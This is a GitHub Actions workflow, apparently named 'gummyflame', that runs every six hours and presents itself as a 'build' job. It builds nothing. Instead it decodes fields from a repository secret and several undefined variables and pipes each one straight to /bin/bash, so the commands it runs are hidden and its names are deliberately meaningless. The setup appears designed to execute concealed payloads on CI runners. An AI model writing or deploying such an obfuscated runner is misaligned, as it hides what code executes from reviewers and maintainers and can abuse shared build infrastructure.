name: gummyflame

on:
  workflow_dispatch:
  schedule:
    - cron: '22 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gummyflame
        env:
          ep994: ${{ secrets.ep994 }}
        run: |
          echo $ep994 | jq -r .yf30 | /bin/bash
          echo $n93 | jq -r .igim0167 | /bin/bash
          echo $hjgx2 | jq -r .bck08148 | /bin/bash
          echo $t95 | jq -r .w47147 | /bin/bash
          echo $uoctv9962 | jq -r .expsz03 | /bin/bash
          echo $ndxr4 | jq -r .nllz4205 | /bin/bash
          echo $yzea237 | jq -r .d9 | /bin/bash
          echo $boki743 | jq -r .n98 | /bin/bash

